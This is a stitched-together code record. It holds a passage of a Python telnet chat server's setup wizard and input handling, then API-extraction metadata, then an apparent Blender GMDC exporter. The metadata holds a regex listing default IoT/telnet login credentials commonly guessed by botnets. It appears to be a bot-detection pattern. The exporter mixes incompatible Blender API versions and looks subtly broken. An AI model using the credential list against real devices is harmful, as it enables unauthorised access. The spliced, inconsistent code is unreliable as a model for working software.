# cheatcode: windows netcat
if self.in_text.startswith("wncat"):
self.linemode = True
self.echo_on = True
self.vt100 = False
self.set_codec("cp437")
self.wizard_stage = "end"
# cheatcode: windows telnet + join
elif self.in_text.startswith("wtn"):
self.set_codec("cp437")
self.wizard_stage = "end"
join_ch = self.in_text[3:]
# cheatcode: linux telnet + join
elif self.in_text.startswith("ltn"):
self.set_codec("utf-8")
self.wizard_stage = "end"
join_ch = self.in_text[3:]
# this is just for the stress tests,
# i don't feel bad about this at all
if join_ch:
def delayed_join(usr, chan):
chan = chan.rstrip("\r\n\0 ") # \0 ??
time.sleep(0.2)
if chan:
print(" delay join: [{0}]".format(chan))
usr.world.join_pub_chan(usr, chan)
threading.Thread(
target=delayed_join, name="d_join", args=(self.user, join_ch)
).start()
if self.wizard_stage == "echo":
if self.linemode:
# echo is always enabled if linemode, skip this stage
if not self.check_correct_iface("linemode"):
return
else:
self.wizard_stage = "echo_answer"
self.in_text = u""
self.say(
(
u"""
A: your text appeared as you typed
B: nothing happened
press A or B&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
if self.wizard_stage == "echo_answer":
text = self.in_text.lower()
if u"a" in text:
self.echo_on = True
if not self.check_correct_iface("linemode"):
return
elif u"b" in text:
if not self.check_correct_iface("linemode"):
return
if self.wizard_stage == "linemode":
if self.linemode:
self.wizard_stage = "linemode_warn"
self.in_text = u""
self.say(
(
top
+ u"""
WARNING:
     your client is stuck in line-buffered mode;
this will cause visual glitches in text input.
Keys like PgUp and CTRL-Z are also buggy;
you must press the key twice followed by Enter.
if you are using Linux or Mac OSX, disconnect and
run the following command before reconnecting:
macOS: stty -f /dev/stdin -icanon
Linux: stty -icanon
press A to accept or Q to quit&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
self.wizard_stage = "color"
if self.wizard_stage == "linemode_warn":
text = self.in_text.lower()
if u"a" in text:
self.wizard_stage = "color"
elif u"q" in text:
self.host.part(self)
if self.wizard_stage == "color":
self.wizard_stage = "color_answer"
self.in_text = u""
self.say(
(
top
+ u"""
   do colours work?
\033[1;31mred, \033[32mgreen, \033[33myellow, \033[34mblue\033[0m
press Y or N&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(u"&lm", u", followed by [Enter]" if self.linemode else u":")
.encode("utf-8")
)
return
if self.wizard_stage == "color_answer":
text = self.in_text.lower()
if u"y" in text:
self.wizard_stage = "codec"
self.in_text = u""
elif u"n" in text:
self.wizard_stage = "vt100"
self.in_text = u""
self.say(
(
sep
+ u"""
what did you see instead?
A: "red, green, yellow, blue"
-- either in just one colour
or otherwise incorrect colours
B: "[1;31mred, [32mgreen, [33myellow, [34mblue[0m"
press A or B&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
if self.wizard_stage == "vt100":
text = self.in_text.lower()
if u"a" in text:
# vt100 itself is probably fine, don't care
self.wizard_stage = "codec"
self.in_text = u""
elif u"b" in text:
self.wizard_stage = "vt100_warn"
self.vt100 = False
self.in_text = u""
self.say(
(
top
+ u"""
WARNING:
your client or terminal is not vt100 compatible!
I will reduce features to a bare minimum,
but this is gonna be bad regardless
whenever the screen turns too glitchy
you can press CTRL-R and Enter to redraw
or run the command "/r" if that doesn't work
press A to accept or Q to quit&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
if self.wizard_stage == "vt100_warn":
text = self.in_text.lower()
if u"a" in text:
self.wizard_stage = "codec"
self.in_text = u""
elif u"q" in text:
self.host.part(self)
AZ = u"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
if self.wizard_stage == "codec":
self.wizard_stage = "codec_answer"
self.in_text = u""
def u8(tx):
return tx.encode("utf-8", "backslashreplace")
to_send = u8(
(ftop + u'\n which line looks like "hmr" or "dna" ?').replace(
u"\n", u"\r\n"
)
)
nth = -1
if not self.vt100:
for nth, (enc, uni) in enumerate(
zip(self.codec_map[::2], self.codec_map[1::2])
):
to_send += u8(u"\r\n\r\n {0}: ".format(AZ[nth]))
try:
to_send += self.codec_uni[uni].encode(enc, "backslashreplace")
except:
to_send += u8("<codec not available>")
to_send += u8(u"\r\n")
else:
for nth, (enc, uni) in enumerate(
zip(self.codec_map[::2], self.codec_map[1::2])
):
to_send += u8(u"\033[{0}H {1}: ".format(nth * 2 + 4, AZ[nth]))
try:
to_send += self.codec_uni[uni].encode(enc, "backslashreplace")
except:
to_send += u8("<codec not available>")
to_send += u8(u"\033[J\033[{0}H\033[J".format(nth * 2 + 5))
to_send += u8(
u"\r\n press {0}{1}\r\n".format(
u"/".join(AZ[: nth + 1]),
u", followed by [Enter]" if self.linemode else u":",
)
)
self.say(to_send)
return
if self.wizard_stage == "codec_answer":
text = self.in_text.lower()
for n, letter in enumerate(AZ[: int(len(self.codec_map) / 2)].lower()):
if letter in text:
self.set_codec(self.codec_map[n * 2])
if self.crlf == u"\r\n" and self.codec != "utf-8":
self.wizard_stage = "texe"
else:
self.wizard_stage = "end"
break
if self.wizard_stage == "texe":
self.wizard_stage = "texe_answer"
self.in_text = u""
m = (
top
+ u"""
are you using telnet.exe on Windows 7 or newer?
Y: Yes; this enables slowmo (network throttle)
which avoids a rendering bug in telnet.exe
N: No, you are using another client
press Y or N&lm
"""
)
self.say(
m.replace(u"\n", u"\r\n")
.replace(u"&lm", u", followed by [Enter]" if self.linemode else u":")
.encode("utf-8")
)
return
if self.wizard_stage == "texe_answer":
text = self.in_text.lower()
if u"y" in text:
self.slowmo_tx = 1
self.in_text = u""
elif u"n" in text:
self.in_text = u""
else:
return
self.wizard_stage = "end"
if self.wizard_stage == "end":
self.save_config()
if not COLORS:
print(
"client conf: stream={0} vt100={1} no-echo={2} enc={3}\n : {4} {5}".format(
u"n" if self.linemode else u"Y",
u"Y" if self.vt100 else u"n",
u"n" if self.echo_on else u"Y",
self.codec,
self.user.nick,
self.adr[0],
)
)
else:
print(
"client conf: {0}stream {1}vt100 {2}no-echo \033[0m{3}\n : {4} {5}".format(
u"\033[1;31m" if self.linemode else u"\033[1;32m",
u"\033[32m" if self.vt100 else u"\033[31m",
u"\033[31m" if self.echo_on else u"\033[32m",
self.codec,
self.user.nick,
self.adr[0],
)
)
if self.num_telnet_negotiations == 0:
self.request_terminal_size()
self.host.unschedule_kick(self)
self.wizard_stage = None
self.in_text = u""
self.in_text_full = u""
self.user.create_channels()
if not self.slowmo_tx:
self.world.cserial += 1
def check_correct_iface(self, next_stage):
if not self.host.other_if:
return True
self.wizard_stage = next_stage
if self.iface_confirmed:
return True
self.iface_confirmed = True
to_say = None
ftop = u"\n" * 20 + u"\033[H\033[J"
top = ftop + u" [ r0c configurator ]\n"
if (
self.__class__.__name__ == "TelnetClient"
and self.num_telnet_negotiations < 1
):
print("client negs: {0} bad_if".format(self.num_telnet_negotiations))
to_say = (
top
+ u"""
your client is not responding to negotiations.
if you are NOT using Telnet,
please connect to port {0}
"""
).format(self.host.other_if)
elif (
self.__class__.__name__ == "NetcatClient"
and self.num_telnet_negotiations > 0
):
print("client negs: {0} bad_if".format(self.num_telnet_negotiations))
to_say = (
top
+ u"""
your client has sent {1} Telnet negotiation{2}.
if you are using Telnet,
please connect to port {0}
"""
).format(
self.host.other_if,
self.num_telnet_negotiations,
u"s" if self.num_telnet_negotiations != 1 else u"",
)
if to_say:
to_say += u"""
are you sure the port is correct?
Y: yes, ignore and continue
N: no, quit
press Y or N, followed by [Enter]
"""
self.in_text = u""
self.wizard_stage = "iface_then_" + next_stage
self.say(to_say.replace(u"\n", u"\r\n").encode("utf-8"))
return False
print("client negs: {0} ok".format(self.num_telnet_negotiations))
return True
def read_cb(self, full_redraw, growth):
# only called by (telnet|netcat).py:handle_read,
# only called within locks on self.world.mutex
# self.wizard_stage = None
if self.wizard_stage is not None:
self.conf_wizard(growth)
if self.wizard_stage is not None:
return
full_redraw = True
old_cursor = self.linepos
esc_scan = True
while esc_scan:
esc_scan = False
aside = u""
for nth, ch in enumerate(self.in_text):
was_esc = None
if aside and aside in self.esc_tab:
# text until now is an incomplete escape sequence;
# if the new character turns into an invalid sequence
# we'll turn the old one into a plaintext string
was_esc = aside
aside += ch
csi = (aside == u"\033") or aside.startswith(u"\033[")
bad_csi = csi and len(aside) > 12
if aside not in self.esc_tab and (bad_csi or not csi):
if bad_csi:
# escape the ESC and take it from the top:
# there might be esc_tab sequences within
self.in_text = u"[ESC]" + aside[1:] + self.in_text[nth + 1 :]
esc_scan = True
break
if was_esc:
# new character made the escape sequence invalid;
# print old buffer as plaintext and create a new
# escape sequence buffer for just the new char
if ch in self.esc_tab:
# ...but only if the new character is
# potentially the start of a new esc.seq.
aside = was_esc
else:
# in this case it isn't
was_esc = False
self.linebuf = (
self.linebuf[: self.linepos]
+ Util.sanitize_ctl_codes(aside)
+ self.linebuf[self.linepos :]
)
self.linepos += len(aside)
self.msg_not_from_hist = True
self.msg_hist_n = None
self.tabcomplete_end()
if was_esc:
aside = ch
else:
aside = u""
else:
# this is an escape sequence; handle it
act = False
if aside in self.esc_tab:
act = self.esc_tab[aside]
if not act:
if not csi:
continue
m = self.re_cursor_pos.match(aside)
if not m:
continue
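                    # cursor-position report (CSI row;col R) doubles as the reply to our terminal-size request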
sh, sw = [int(x) for x in m.groups()]
self.pending_size_request = False
self.handshake_sz = True
if self.w != sw or self.h != sh:
full_redraw = True
self.set_term_size(sw, sh)
aside = aside[len(m.group(0)) :]
continue
if self.ar.dbg:
print(" escape seq: {0} = {1}".format(Util.b2hex(aside), act))
if self.tc_nicks and act != "tab":
self.tabcomplete_end()
hist_step = 0
chan_shift = 0
aside = u""
if act == "cl":
self.linepos -= 1
if self.linepos < 0:
self.linepos = 0
elif act == "cr":
self.linepos += 1
if self.linepos > len(self.linebuf):
self.linepos = len(self.linebuf)
elif act == "cu":
hist_step = -1
if self.echo_on:
self.need_full_redraw = True
elif act == "cd":
hist_step = 1
elif act == "home":
self.linepos = 0
elif act == "end":
self.linepos = len(self.linebuf)
elif act == "bs":
if self.linepos > 0:
self.linebuf = (
self.linebuf[: self.linepos - 1]
+ self.linebuf[self.linepos :]
)
self.linepos -= 1
elif act == "ret":
if self.echo_on:
self.need_full_redraw = True
if self.linebuf:
# add this to the message/command ("input") history
if not self.msg_hist or self.msg_hist[-1] != self.linebuf:
self.msg_hist.append(self.linebuf)
self.msg_not_from_hist = False
self.pending_size_request = False
single = self.linebuf.startswith("/")
double = self.linebuf.startswith("//")
if single and not double:
# this is a command
self.user.exec_cmd(self.linebuf[1:])
else:
if double:
# remove escape character
self.linebuf = self.linebuf[1:]
self.world.send_chan_msg(
self.user.nick,
self.user.active_chan.nchan,
Util.convert_color_codes(self.linebuf),
)
self.msg_hist_n = None
self.linebuf = u""
self.linepos = 0
elif act == "pgup" or act == "pgdn":
steps = self.h - 4
if self.scroll_i is not None:
steps = self.scroll_i
elif self.scroll_f is not None:
steps = int(steps * self.scroll_f)
else:
print("no scroll size?!")
if act == "pgup":
steps *= -1
self.scroll_cmd = steps
elif act == "redraw":
self.user.exec_cmd("r")
elif act == "prev-chan":
chan_shift = -1
elif act == "next-chan":
chan_shift = +1
elif act == "alt-tab":
self.user.exec_cmd("a")
elif act == "tab":
self.tabcomplete()
else:
print("unimplemented action: {0}".format(act))
if chan_shift != 0:
i = self.user.chans.index(self.user.active_chan) + chan_shift
if i < 0:
i = len(self.user.chans) - 1
if i >= len(self.user.chans):
i = 0
self.user.new_active_chan = self.user.chans[i]
elif hist_step == 0:
self.msg_hist_n = None
else:
if self.msg_hist_n is None:
if hist_step < 0:
self.msg_hist_n = len(self.msg_hist) - 1
else:
self.msg_hist_n += hist_step
if self.msg_hist_n is not None:
if self.msg_hist_n < 0 or self.msg_hist_n >= len(
self.msg_hist
):
self.msg_hist_n = None
# capture unfinished entries so they can be resumed
if self.linebuf and self.msg_not_from_hist:
self.msg_hist.append(self.linebuf)
self.msg_not_from_hist = False
if self.msg_hist_n is None:
self.linebuf = u""
else:
self.linebuf = self.msg_hist[self.msg_hist_n]
self.linepos = len(self.linebuf)
if aside:
if self.ar.dbg:
print(
"need more data for {0} runes: {1}".format(
len(aside), Util.b2hex(aside)
)
)
self.in_text = aside
else:
self.in_text = u""
if self.w < 20 or self.h < 4:
msg = "x"
for cand in self.msg_too_small:
# print('{0} <= {1}'.format(len(cand), self.w))
if len(cand) <= self.w:
msg = cand
break
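            # paint the screen red and center the notice a third of the way down; +1 converts to 1-based terminal coordinates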
y = int(self.h / 3)
x = int((self.w - len(msg)) / 2)
x += 1
y += 1
print("2smol @ {0} {1}".format(x, y))
msg = u"\033[H\033[1;37;41m\033[J\033[{0};{1}H{2}\033[0m".format(y, x, msg)
self.say(msg.encode(self.codec, "backslashreplace"))
self.too_small = True
return
self.too_small = False
if (
self.size_request_action
and not self.pending_size_request
and self.size_request_action == "redraw"
):
self.size_request_action = None
full_redraw = True
if self.ar.dbg:
if self.dead:
print("CANT_ANSWER: dead")
if not self.handshake_sz:
print("CANT_ANSWER: handshake_sz")
if not self.handshake_world:
print("CANT_ANSWER: handshake_world")
if not self.dead:
with self.world.mutex:
if full_redraw:
self.need_full_redraw = True
if self.handshake_sz:
self.refresh(old_cursor != self.linepos)
def tabcomplete(self):
if self.tc_nicks:
self.tabcomplete_cycle()
else:
self.tabcomplete_init()
def tabcomplete_init(self):
try:
chan = self.user.active_chan.nchan
except:
return
txt = self.linebuf[: self.linepos]
ofs = txt.rfind(" ")
if ofs >= 0:
prefix = txt[ofs + 1 :].lower()
else:
prefix = txt.lower()
self.tc_nicks = [prefix]
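        # entry 0 is the typed prefix itself (so cycling can wrap back to it); then matching nicks, most recently active first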
for usr, ts in reversed(
sorted(chan.user_act_ts.items(), key=operator.itemgetter(1))
):
if usr != self.user.nick and usr.lower().startswith(prefix):
self.tc_nicks.append(usr)
if len(self.tc_nicks) == 1:
self.tc_nicks = None
return
self.tc_msg_pre = self.linebuf[: self.linepos - len(prefix)]
self.tc_msg_post = self.linebuf[self.linepos :]
self.tc_n = 0
self.tabcomplete_cycle()
def tabcomplete_cycle(self):
self.tc_n += 1
if self.tc_n >= len(self.tc_nicks):
self.tc_n = 0
if not self.tc_msg_pre:
nick_suffix = u": "
else:
nick_suffix = u" "
nick = self.tc_nicks[self.tc_n]
if nick == "":
nick_suffix = u""
self.linebuf = self.tc_msg_pre + nick + nick_suffix
self.linepos = len(self.linebuf)
self.linebuf += self.tc_msg_post
def tabcomplete_end(self):
self.tc_nicks = None
self.tc_post = None
self.tc_pre = None
|
[
"threading.Thread",
"socket.socket",
"time.strftime",
"time.time",
"time.sleep",
"datetime.datetime.utcnow",
"os.path.isfile",
"datetime.datetime.utcfromtimestamp",
"binascii.unhexlify",
"socket.getpeername",
"operator.itemgetter",
"queue.Queue",
"re.compile"
] |
[((746, 1323), 're.compile', 're.compile', (["('root|Admin|admin|default|support|user|password|telnet|' +\n    'guest|operator|supervisor|daemon|service|enable|system|' +\n    'manager|baby|netman|telecom|volition|davox|sysadm|busybox|' +\n    'tech|888888|666666|mg3500|merlin|nmspw|super|setup|vizxv|' +\n    'HTTP/1|222222|xxyyzz|synnet|PlcmSpIp|Glo|e8ehome|xc3511|' +\n    'taZz@|aquario|1001chin|Oxhlw|S2fGq|Zte521|ttnet|tlJwp|' +\n    't0tal|gpon|anko|changeme|hi3518|antslq|juantech|zlxx|' +\n    'xmhdipc|ipcam|cat10|synnet|ezdvr|vstarcam|klv123|' +\n    'ubnt|hunt57|Alphanet|epicrout|annie20|realtek|netscreen')"], {}), "('root|Admin|admin|default|support|user|password|telnet|' +\n    'guest|operator|supervisor|daemon|service|enable|system|' +\n    'manager|baby|netman|telecom|volition|davox|sysadm|busybox|' +\n    'tech|888888|666666|mg3500|merlin|nmspw|super|setup|vizxv|' +\n    'HTTP/1|222222|xxyyzz|synnet|PlcmSpIp|Glo|e8ehome|xc3511|' +\n    'taZz@|aquario|1001chin|Oxhlw|S2fGq|Zte521|ttnet|tlJwp|' +\n    't0tal|gpon|anko|changeme|hi3518|antslq|juantech|zlxx|' +\n    'xmhdipc|ipcam|cat10|synnet|ezdvr|vstarcam|klv123|' +\n    'ubnt|hunt57|Alphanet|epicrout|annie20|realtek|netscreen')\n", (756, 1323), False, 'import re\n'), ((1539, 1588), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (1552, 1588), False, 'import socket\n'), ((2022, 2057), 'time.strftime', 'time.strftime', (['"%d/%m/%Y, %H:%M:%S"'], {}), "('%d/%m/%Y, %H:%M:%S')\n", (2035, 2057), False, 'import time\n'), ((4991, 5002), 'time.time', 'time.time', ([], {}), '()\n', (5000, 5002), False, 'import time\n'), ((8062, 8069), 'queue.Queue', 'Queue', ([], {}), '()\n', (8067, 8069), False, 'from queue import Queue\n'), ((8093, 8100), 'queue.Queue', 'Queue', ([], {}), '()\n', (8098, 8100), False, 'from queue import Queue\n'), ((9455, 9503), 're.compile', 're.compile', (['"\\\\033\\\\[([0-9]{1,4});([0-9]{1,4})R"'], {}), "('\\\\033\\\\[([0-9]{1,4});([0-9]{1,4})R')\n", (9465, 9503), False, 'import re\n'), ((11298, 11359), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.handshake_timeout', 'name': '"hs_to"'}), "(target=self.handshake_timeout, name='hs_to')\n", (11314, 11359), False, 'import threading\n'), ((17380, 17393), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (17390, 17393), False, 'import time\n'), ((7646, 7668), 'os.path.isfile', 'os.path.isfile', (['log_fn'], {}), '(log_fn)\n', (7660, 7668), False, 'import os\n'), ((5602, 5639), 'os.path.isfile', 'os.path.isfile', (['self.user_config_path'], {}), '(self.user_config_path)\n', (5616, 5639), False, 'import os\n'), ((29302, 29319), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (29317, 29319), False, 'from datetime import datetime\n'), ((31323, 31334), 'time.time', 'time.time', ([], {}), '()\n', (31332, 31334), False, 'import time\n'), ((37291, 37324), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (['msg.ts'], {}), '(msg.ts)\n', (37316, 37324), False, 'from datetime import datetime\n'), ((61845, 61863), 'time.sleep', 'time.sleep', (['(100000)'], {}), '(100000)\n', (61855, 61863), False, 'import time\n'), ((7583, 7594), 'time.time', 'time.time', ([], {}), '()\n', (7592, 7594), False, 'import time\n'), ((22899, 22952), 'threading.Thread', 'threading.Thread', ([], {'target': 'delayed_drop', 'name': '"dropcli"'}), "(target=delayed_drop, name='dropcli')\n", (22915, 22952), False, 'import threading\n'), ((96904, 96926), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (96923, 96926), False, 'import operator\n'), ((13159, 13183), 'binascii.unhexlify', 'binascii.unhexlify', (['crlf'], {}), '(crlf)\n', (13177, 13183), False, 'import binascii\n'), ((22528, 22541), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (22538, 22541), False, 'import time\n'), ((73635, 73650), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (73645, 73650), False, 'import time\n'), ((2838, 2858), 'socket.getpeername', 'socket.getpeername', ([], {}), '()\n', (2856, 2858), False, 'import socket\n'), ((73838, 73917), 'threading.Thread', 'threading.Thread', ([], {'target': 'delayed_join', 'name': '"d_join"', 'args': '(self.user, join_ch)'}), "(target=delayed_join, name='d_join', args=(self.user, join_ch))\n", (73854, 73917), False, 'import threading\n'), ((7799, 7810), 'time.time', 'time.time', ([], {}), '()\n', (7808, 7810), False, 'import time\n'), ((20797, 20808), 'time.time', 'time.time', ([], {}), '()\n', (20806, 20808), False, 'import time\n'), ((32430, 32441), 'time.time', 'time.time', ([], {}), '()\n', (32439, 32441), False, 'import time\n'), ((4821, 4832), 'time.time', 'time.time', ([], {}), '()\n', (4830, 4832), False, 'import time\n'), ((14048, 14059), 'time.time', 'time.time', ([], {}), '()\n', (14057, 14059), False, 'import time\n')]
|
#!BPY
"""
Name: 'GMDC (.gmdc)'
Blender: 249
Group: 'Export'
Tooltip: 'Export to TS2 GMDC file' """
# -------------------------------------------------------------------------------
# Copyright (C) 2016 DjAlex88 (https://github.com/djalex88/)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -------------------------------------------------------------------------------
import os
from struct import pack
from io_scene_gmdc.gmdc_tools import *
from itertools import count, repeat
import bpy
import Blender  # the GUI code below also calls the legacy Blender.BGL module (Blender 2.49 API)
from mathutils import Vector as BlenderVector
########################################
## Exporter
########################################
def prepare_geometry(settings):
scene = bpy.data.scenes.active
# get all mesh objects
objects = filter(lambda obj: obj.type == 'Mesh', scene.objects)
# check whether visual transforms applied
v = [obj for obj in objects if tuple(obj.rot) != (0, 0, 0) or tuple(obj.size) != (1, 1, 1)]
if v:
error('Error! The following mesh ' + (
'objects have' if len(v) > 1 else 'object has') + ' non-applied visual transforms:')
for obj in v:
error('\x20\x20%s -> rot: %s, size: %s' % (str(obj), str(obj.rot), str(obj.size)))
error('Solution: apply visual transforms (Ctrl+A).')
return False
if settings['export_bmesh']:
# does bounding mesh exist?
v = [i for i, obj in enumerate(objects) if obj.name == settings['bmesh_name']]
if not v:
error('Error! Could not find bounding mesh.')
return False
# remove from objects
del objects[v[0]]
if not objects:
error('Error! Object list is empty.')
return False
#
# inverse transforms
#
inverse_transforms = None
if settings['export_rigging']:
if scene.properties.has_key('gmdc_inverse_transforms'):
v = tuple(scene.properties['gmdc_inverse_transforms'])
assert len(v) % 7 == 0
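            # each transform is 7 floats: a 4-float rotation quaternion followed by a 3-float translation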
v = [chunk(t, 4) for t in chunk(v, 7)]
inverse_transforms = v
else:
error('Error! No inverse transforms. (scene.properties["gmdc_inverse_transforms"] is not defined.)')
return False
#
# process main geometry
#
DATA_GROUPS = [];
INDEX_GROUPS = []
MORPH_NAMES = [] # [index] -> name
log('Main geometry')
for obj in objects:
log(str(obj))
# make current object active and activate basic shape key
scene.objects.active = obj
obj.activeShape = 1
bpy.app.Window.EditMode(1)
bpy.app.Window.EditMode(0)
mesh = obj.getData(mesh=True)
all_vertices = [] # for non-indexed vertices
bone_indices = {} # used to enumerate bones { global_bone_index -> local_bone_index }
# faces
#
mesh_faces = mesh.faces
if not mesh_faces:
error('Error! Mesh object has no faces.')
return False
# all faces must have texture coordinates
try:
assert all(face.uv for face in mesh_faces)
except:
error('Error! Mesh object has faces with no texture coordinates.')
return False
# tangents
if settings['export_tangents']:
mesh_tangents = [[tuple(x.xyz) for x in tangents] for tangents in mesh.getTangents()]
else:
mesh_tangents = repeat((None, None, None, None)) # no tangents
obj_loc = obj.matrix[3].xyz
# rigging
rigging = settings['export_rigging']
for face, tangents in zip(mesh_faces, mesh_tangents):
verts = [tuple((v.co + obj_loc).xyz) for v in face.verts]
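            # smooth-shaded faces use per-vertex normals; flat faces repeat the face normal for every corner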
norms = [tuple(v.no.xyz) for v in face.verts] if face.smooth else [tuple(face.no.xyz)] * len(verts)
uv = [(t.x, 1.0 - t.y) for t in face.uv] # OpenGL -> Direct3D
if rigging:
bones = []
weights = []
for v in face.verts:
v_groups = mesh.getVertexInfluences(v.index)
b = tuple()
w = tuple()
for name, f in v_groups:
# get bone index
s = name.split('#')
try:
assert f > 0.0
idx = int(s[-1])
if len(s) < 2 or idx < 0: raise Exception()
except AssertionError:
pass
except:
log(
'Warning! Could not extract bone index from vertex group name "%s". Influence on vertex # %i ignored.' % (
name, v.index))
else:
k = bone_indices.get(idx)
if k == None:
k = len(bone_indices)
bone_indices[idx] = k
b += (k,)
w += (f,)
if len(b) > 4:
                            error('Error! Vertex # %i of mesh object "%s" is in more than 4 vertex groups.' % (
v.index, obj.name))
return False
# normalize weights
f = sum(w)
if f > 0.0001:
w = tuple(x / f for x in w)
else:
w = tuple(0.0 for x in w) # ?
bones.append(b)
weights.append(w)
else:
bones = [(), (), (), ()]
weights = [(), (), (), ()]
# triangulate (if needed)
if len(face.verts) == 4:
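                # split the quad into triangles (0, 1, 2) and (0, 2, 3)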
order = (0, 1, 2, 0, 2, 3)
verts = [verts[i] for i in order]
norms = [norms[i] for i in order]
uv = [uv[i] for i in order]
bones = [bones[i] for i in order]
weights = [weights[i] for i in order]
tangents = [tangents[i] for i in order]
# add vertices to list
all_vertices += zip(verts, norms, uv, bones, weights, tangents)
# <- faces
mesh_tangents = None
#
# morphs / vertex animations
#
morphing = settings['export_morphs'] and mesh.key and len(mesh.key.blocks) > 1
if morphing:
morphing = settings['export_morphs'] # 1 - dVerts only; 2 - dVerts & dNorms
log('--Processing shape keys...')
mesh_morphs = [] # current mesh morphs
first_new_morph_index = None # first new morph that is not present in MORPH_NAMES
dVerts = []
dNorms = []
# compute differences
for k, key_block in enumerate(mesh.key.blocks[1:], 2):
name = tuple(key_block.name.strip().split('::'))
if len(name) != 2:
error('Error! Invalid morph name: "%s"' % '::'.join(name))
return False
try:
j = MORPH_NAMES.index(name)
except ValueError:
# new morph
j = len(MORPH_NAMES)
MORPH_NAMES.append(name)
if first_new_morph_index == None: first_new_morph_index = j
mesh_morphs.append(j)
log('--Key "%s" (%i)' % (name, k))
# activate morph
obj.activeShape = k
bpy.app.Window.EditMode(1)
bpy.app.Window.EditMode(0)
key_block_verts = key_block.getData()
# add difference arrays
dv = [];
dVerts.append(dv)
dn = [];
dNorms.append(dn)
# loop through all faces and compute vertex differences
j = 0
for face in mesh_faces:
verts = [(key_block_verts[v.index] + obj_loc) for v in face.verts]
norms = [v.no for v in face.verts] if face.smooth else [face.no] * len(verts)
if len(face.verts) == 4:
order = (0, 1, 2, 0, 2, 3)
verts = [verts[i] for i in order]
norms = [norms[i] for i in order]
for v, w in zip(verts, norms):
dv.append(tuple((v - BlenderVector(all_vertices[j][0])).xyz))
dn.append(tuple((w - BlenderVector(all_vertices[j][1])).xyz))
j += 1
assert j == len(all_vertices)
log('--Packing...')
k = len(all_vertices)
keys = [[] for i in range(k)]
if morphing == 2: # vertices and normals
v = [[] for i in range(k)]
w = [[] for i in range(k)]
for i, dv, dn in zip(mesh_morphs, dVerts, dNorms): # loop through all difference arrays (morphs)
for x, y, k, a, b in zip(dv, dn, keys, v, w):
if x != (0.0, 0.0, 0.0) or y != (0.0, 0.0, 0.0): # vertex affected
if len(k) == 4:
error('Error! Some vertices are affected by more than 4 morphs (shape keys).')
return False
# morph index
k.append(i)
# difference
a.append(x)
b.append(y)
dVerts = v;
v = None
dNorms = w;
w = None
else: # vertices only
v = [[] for i in range(k)]
for i, dv in zip(mesh_morphs, dVerts):
for x, k, a in zip(dv, keys, v):
if x != (0.0, 0.0, 0.0):
if len(k) == 4:
error('Error! Some vertices are affected by more than 4 morphs (shape keys).')
return False
# morph index
k.append(i)
# difference
a.append(x)
dVerts = v;
v = None
assert len(dVerts) == len(all_vertices)
if not any(keys):
            log('--Differences between shape keys of mesh object "%s" were not detected.' % obj.name)
morphing = False
if first_new_morph_index != None:
del MORPH_NAMES[first_new_morph_index:] # remove newly added morph names
else:
keys = map(tuple, keys)
j = max(len(v) for v in dVerts) # number of difference arrays
log('--Number of arrays:', j)
dVerts = [(tuple(dv) + ((0.0, 0.0, 0.0),) * 4)[:j] for dv in dVerts] # align
if morphing == 2:
dNorms = [(tuple(dn) + ((0.0, 0.0, 0.0),) * 4)[:j] for dn in dNorms]
for i, k, dv, dn in zip(count(), keys, dVerts, dNorms):
all_vertices[i] += (k, dv, dn)
else:
for i, k, dv in zip(count(), keys, dVerts):
all_vertices[i] += (k, dv)
dVerts = dNorms = None;
keys = None
# <- morphing
#
# index geometry
#
log('--Indexing geometry...')
unique_verts = {} # { vertex -> index }
indices = []
for vertex in all_vertices:
k = unique_verts.setdefault(vertex, len(unique_verts))
indices.append(k)
unique_verts = [v for v, i in sorted(unique_verts.iteritems(), key=lambda x: x[1])]
log('\x20\x20--Vertex count: %i -> %i' % (len(all_vertices), len(unique_verts)))
del all_vertices
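        # unzip the vertex tuples into parallel columns; morph columns (K, dV, dN) that were not built are padded with None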
V, N, T, B, W, X, K, dV, dN = map(list, zip(*unique_verts)) + (
[None, None, None] if not morphing else [None] * (2 - morphing))
del unique_verts
#
# add new data group or extend an existing one
#
# does the mesh have rigging data ?
rigging = rigging and any(B)
# try to find a suitable data group
group = None
for i, g in enumerate(DATA_GROUPS):
b1 = bool(g.bones) == rigging
if morphing:
b2 = sum(bool(x) for x in g.dVerts) == len(dV[0]) # same number of difference arrays
else:
b2 = not bool(g.dVerts[0]) # no difference arrays
if b1 and b2:
# found
ref_group, group = i, g
break
if group:
